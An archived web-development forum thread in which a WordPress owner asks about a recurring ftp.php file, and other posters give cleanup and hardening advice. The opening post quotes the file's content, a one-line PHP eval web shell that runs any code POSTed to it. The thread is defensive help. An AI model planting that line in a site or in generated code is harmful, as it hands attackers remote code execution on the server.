The forums ran from 2008-2020 and are now closed and viewable here as an archive.

Home Forums Other Hacker leaves ftp.php file

  • This topic is empty.
Viewing 15 posts - 1 through 15 (of 18 total)
  • Author
  • #179450

    It appears as if a couple of my wordpress sites keep getting hacked. I have WordFence installed and have changed my passwords ect. but a file called http://ftp.php keeps getting uploaded to my “uploads”-folder.

    It contains this:

    echo '123.txt';
    <?php @eval($_POST['a']);?>

    What does this do? Any idead how to get rid of this? I havn’t experienced any other issues on the blog besides this file.


    a file called http://ftp.php keeps getting uploaded to my “uploads”-folder.

    You have code somewhere that allows unsafe uploads, most likely in a plugin. File uploads must be validated (e.g., if you want an image, make sure it actually is an image) and stored safely (e.g., do not store executable files where anyone can request them).

    <?php @eval($_POST['a']);?>

    This allows the attacker to do anything they want. They will POST php code to this page, and it will run automatically.

    You need to delete everything from your web space and replace it with a fresh WP install (meaning, a new copy downloaded from the wordpress site). Do not save anything.*

    Contact your web host and tell them what is going on. They might wish to take other actions.

    Look at your database and make sure there are no “unknown” users or users with the wrong permissions (e.g., extra admin accounts).

    Review all plugins you are using. If they are not absolutely necessary, do not use them at all. Uninstall them and actually delete all related files from your host. If they are necessary, make sure: 1) this plugin is under active delelopment (i.e., you can contact the creator/maintainer, and they respond), 2) you’re using the most current version, and 3) there are no reported, unsolved security issues.

    * if the problem keeps re-appearing, then you either 1) have a security vulnerability which is still open, or 2) the attacker also uploaded a script that restores the eval script when you delete it. In all likelihood, both.

    If your efforts are unsuccessful, you will need to ask your host to clean up your web space.


    Listen to Mr. Thunderscore… because he knows more about PHP and WP than most people here.

    Google can and will punish you in terms of 530 (Essss Eeeee Ohhh) if it is found your site is dishing out malicious content or working as a spam relay.

    Time is of the essence in this matter.


    he knows more about PHP and WP than most people here.

    I appreciate that, except for the WP part. : )

    Seriously, I dislike WP and I don’t use it, as a rule. I do understand what is going on with the attack, and, in general terms, the underlying cause as it relates to wordpress.

    Google can and will punish you …

    Not to mention all the actual people that could fall victim to such things.

    It’s not just google, either. No one likes spam servers. A few years back I was on a shared host and, suddenly, emails from my site stopped going through. Turns out another site hosted on my server had been cracked and was running spam. Got a whole range of machines blacklisted.


    Hmmm … okay. So the issue is with two different installs which are running the same theme. But on different server. Can the issue be in the theme?


    Can the issue be in the theme?

    Possibly. Where did you get it? is the designer reputable? any similar problems reported? If you are unsure, do not use the same theme again.

    To be clear, I am not suggesting you try to “fix” it. You will miss something.

    Delete everything and start over.

    If your backup is too recent, or if it was stored on the same server as the site, then it is not safe. In any case, do not use any php scripts or other executable files from your backup (only static assets, like images).


    Hey Mr. Thunderscore… is this why you don’t like WP?


    Can I save the database? I can save the database right?


    You can. You essentially have to perform a migration but Mr. Thunderscore knows way more about that. He’s pretty handy with Maria.


    is this why you don’t like WP?

    Partly. Believe it or not, it’s not the main reason. I just hate trying to work with the code.

    Can I save the database? I can save the database right?

    As I said, you need to check the database and make sure you don’t have any suspicious accounts. It’s fairly common for an attacker to create another admin account so they have more free access to the site. If this happened, they could just come back, log in, and restore everything afterwards.

    You might consider hiring someone who is very familiar with what the WP databases should look like to make sure nothing has been changed.

    If you have any plugins that allow you to add PHP to your posts, this needs to be removed too (permanently, I mean; and check the posts in the DB for any php code).

    A migration to a freshly installed database would probably be good, if the DB had actually been changed. But if it’s just a matter of bad content, it wouldn’t help.


    This is probably not the right time… and I know that. So, please don’t get pissed. But… this seems like a nice opportunity to really evaluate whether or not you NEED WP. I would say 90% of people who use it… don’t. You’re probably no exception… but I can’t be sure. Only you can know that.

    While this may not be the most helpful comment… WP is KNOWN for these types of issues. It is not what anyone would consider secure. The entire ecosystem is built and grows in a way that is inherently INSECURE. I stopped using it years ago and my life has been simpler ever since.


    Hi guys,

    I got the same problem 6 days ago. I receveid an email with the attached http://ftp.php with that code. I found the file in uploads folder with permissions 0644. It seems that nothing else was append, site seem to work fine, no user added and no file seems change altered after that day. I have iTheme security installed on wordpress, this could have protect my site ? The fact that the file has no executing permission could save my site or I need to reinstall everything.
    Thanks a lot



    Oh yeah. forgot to mention the strange e-mail you get (from your own e-mail) telling you the follwing:

    _Email without subject from site PROUD!.


    This email is been sent by %name% (email. %email%)._

    And then the http://ftp.php file is attached.


    I would:

    • Backup WP Uploads/ Theme Folder
    • Export database
    • Delete Everything
      • If shared hosting contact your hosting provider
      • If on VPS, destroy it and start over.


    • Inspect Uploads folder and save all the image, pdf, content files.
    • Inspect theme files
    • Import database locally and create custom queries exporting only content
    • Install fresh copy of WordPress and start piecing together everything

    This might take some time, but it’s the only way to know for sure there’s no back door to your server.

    When it comes to WordPress you live and die by the plugin ecosystem. Whenever I build WP sites, I only include a plugin if I must.

    Check out WordPress Hacker’s Guide to the Galaxy for some advanced topics.


    Inspect Uploads folder and save all the image, pdf, content files.

    Yes, but not blindly. Realize that there is no guarantee that a file is an image just because it is named sunday-picnic.jpg — it could be anything.

    When it comes to WordPress you live and die by the plugin ecosystem.

    Yeah. WP itself (the core, unmodified, only officially released stuff and recommended configurations) is much better with security than it has been in the past. It’s borderline, but it’s generally considered safe nowadays.

    Once you start using outside themes and plugins, all bets are off.

    WP is not only a big target (meaning there is lots of malicious stuff released), even honest WP developers don’t necessarily know how to write resilient, secure programs.

Viewing 15 posts - 1 through 15 (of 18 total)
  • The forum ‘Other’ is closed to new topics and replies.